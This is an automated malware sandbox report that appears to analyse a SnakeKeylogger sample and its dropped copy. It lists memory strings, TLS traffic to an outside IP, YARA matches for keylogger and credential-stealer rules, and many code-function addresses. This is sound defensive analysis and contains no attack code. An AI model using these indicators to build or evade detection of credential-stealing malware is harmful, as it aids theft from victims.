                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000313F000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
                Source: OtldpQxzAw.exe, 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B0F000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.000000000313F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B3A000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002B7F000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002BA8000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031D9000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000031AF000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.0000000003169000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
                Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/v20w
                Source: OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DA2000.00000004.00000800.00020000.00000000.sdmp, OtldpQxzAw.exe, 00000009.00000002.3312270921.0000000003DDC000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.000000000440B000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3311523422.00000000043D1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032B1000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
                Source: wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032A2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/0
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002C81000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/4
                Source: OtldpQxzAw.exe, 00000009.00000002.3307087462.0000000002C7C000.00000004.00000800.00020000.00000000.sdmp, wiSeRRwvZHTk.exe, 0000000E.00000002.3306390132.00000000032AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB
                Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49688
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49687
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49684
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49691 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49704 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49684 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49688 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
                Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49698
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 49694 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49694
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49691
                Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
                Source: unknownNetwork traffic detected: HTTP traffic on port 49716 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49704
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
                Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49718 version: TLS 1.2
                Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.8:49721 version: TLS 1.2

                System Summary

                barindex
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.OtldpQxzAw.exe.4297268.1.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.wiSeRRwvZHTk.exe.4cb4458.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.OtldpQxzAw.exe.4253448.3.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.OtldpQxzAw.exe.4297268.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 0.2.OtldpQxzAw.exe.4253448.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
                Source: 10.2.wiSeRRwvZHTk.exe.4ad4a08.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables with potential process hoocking Author: ditekSHen
                Source: 00000009.00000002.3301331554.000000000042E000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000A.00000002.955729902.0000000004CB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 00000000.00000002.903173734.0000000004253000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: 0000000A.00000002.955729902.0000000004AD4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: OtldpQxzAw.exe PID: 6416, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: OtldpQxzAw.exe PID: 808, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: Process Memory Space: wiSeRRwvZHTk.exe PID: 2664, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeProcess Stats: CPU usage > 49%
                Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_00C1D3E40_2_00C1D3E4
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_026369B00_2_026369B0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_02631C3F0_2_02631C3F
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_026300400_2_02630040
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_026369A10_2_026369A1
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674E6F80_2_0674E6F8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06747CB80_2_06747CB8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06746D980_2_06746D98
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674CD800_2_0674CD80
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06745B880_2_06745B88
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674E6E90_2_0674E6E9
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06749F700_2_06749F70
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06749F800_2_06749F80
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674D4C00_2_0674D4C0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674D4B00_2_0674D4B0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06744C990_2_06744C99
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674CD6F0_2_0674CD6F
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674A5400_2_0674A540
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06748D100_2_06748D10
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06748D000_2_06748D00
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674D2680_2_0674D268
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674D25B0_2_0674D25B
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674A3700_2_0674A370
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06745B730_2_06745B73
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06749B500_2_06749B50
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674EBD00_2_0674EBD0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674EBC00_2_0674EBC0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06747BB70_2_06747BB7
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_067463990_2_06746399
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674A3800_2_0674A380
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674D0180_2_0674D018
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674E0180_2_0674E018
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674D0080_2_0674D008
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674E00B0_2_0674E00B
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674A0F00_2_0674A0F0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_0674A0E10_2_0674A0E1
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B92BC00_2_06B92BC0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B965600_2_06B96560
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B980400_2_06B98040
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B961280_2_06B96128
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B961180_2_06B96118
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B95CF00_2_06B95CF0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B95CE10_2_06B95CE1
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B97C080_2_06B97C08
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B92C0B0_2_06B92C0B
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 0_2_06B998B10_2_06B998B1
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BC1469_2_010BC146
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BA0889_2_010BA088
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010B53709_2_010B5370
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BD2CA9_2_010BD2CA
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BD5999_2_010BD599
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BC4689_2_010BC468
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BC7389_2_010BC738
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010B69A09_2_010B69A0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BCA089_2_010BCA08
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BEC189_2_010BEC18
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010B6FC89_2_010B6FC8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BCFF89_2_010BCFF8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010B3E099_2_010B3E09
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010B39EE9_2_010B39EE
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010B29EC9_2_010B29EC
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BF8049_2_010BF804
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010B3AA19_2_010B3AA1
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BEC0A9_2_010BEC0A
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_010BFC499_2_010BFC49
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_06882A989_2_06882A98
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_068823B09_2_068823B0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_068853B09_2_068853B0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_06889FF89_2_06889FF8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_068898D09_2_068898D0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_06881C589_2_06881C58
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688EE809_2_0688EE80
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688EE909_2_0688EE90
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_068896B09_2_068896B0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688F2D99_2_0688F2D9
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688F2E89_2_0688F2E8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688EA289_2_0688EA28
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688EA389_2_0688EA38
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688FB8B9_2_0688FB8B
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688FB989_2_0688FB98
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_06889F919_2_06889F91
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_068823AB9_2_068823AB
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_068853AB9_2_068853AB
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_06888F289_2_06888F28
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_06880B209_2_06880B20
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_06888F279_2_06888F27
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_06880B309_2_06880B30
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688F7309_2_0688F730
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688F7409_2_0688F740
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688D4809_2_0688D480
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688D8D89_2_0688D8D8
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688D0289_2_0688D028
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688003F9_2_0688003F
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_06881C499_2_06881C49
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_068800409_2_06880040
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688D4719_2_0688D471
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688E1889_2_0688E188
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688E1879_2_0688E187
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688E5D39_2_0688E5D3
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688E5E09_2_0688E5E0
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688DD219_2_0688DD21
                Source: C:\Users\user\Desktop\OtldpQxzAw.exeCode function: 9_2_0688DD309_2_0688DD30
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_01886F9010_2_01886F90
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_0188D3E410_2_0188D3E4
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_057A69B010_2_057A69B0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_057A004010_2_057A0040
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_057A000710_2_057A0007
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_057A69A110_2_057A69A1
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DE6F810_2_074DE6F8
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DCD8010_2_074DCD80
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D6D9810_2_074D6D98
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D7CB810_2_074D7CB8
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D5B8810_2_074D5B88
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D9F7010_2_074D9F70
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D9F8010_2_074D9F80
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DE6E910_2_074DE6E9
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DA54010_2_074DA540
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DCD6F10_2_074DCD6F
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D8D0010_2_074D8D00
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D8D1010_2_074D8D10
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DD4C010_2_074DD4C0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D4C9910_2_074D4C99
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DD4B010_2_074DD4B0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D9B5010_2_074D9B50
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DA37010_2_074DA370
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D5B7210_2_074D5B72
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DEBC010_2_074DEBC0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DEBD010_2_074DEBD0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DA38010_2_074DA380
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D639910_2_074D6399
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074D7BB710_2_074D7BB7
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DD25A10_2_074DD25A
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DD26810_2_074DD268
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DD00810_2_074DD008
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DE00A10_2_074DE00A
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DD01810_2_074DD018
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DE01810_2_074DE018
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DA0E110_2_074DA0E1
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_074DA0F010_2_074DA0F0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CA655110_2_07CA6551
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CA656010_2_07CA6560
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CA612810_2_07CA6128
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CA804010_2_07CA8040
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CA5CF010_2_07CA5CF0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CA2C0A10_2_07CA2C0A
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CA7C0810_2_07CA7C08
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 10_2_07CA98B110_2_07CA98B1
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030B537014_2_030B5370
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BD2CA14_2_030BD2CA
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030B711814_2_030B7118
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BC14614_2_030BC146
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BA08814_2_030BA088
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BC78814_2_030BC788
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BD59914_2_030BD599
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BCA5814_2_030BCA58
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030B69A014_2_030B69A0
                Source: C:\Users\user\AppData\Roaming\wiSeRRwvZHTk.exeCode function: 14_2_030BCFF714_2_030BCFF7
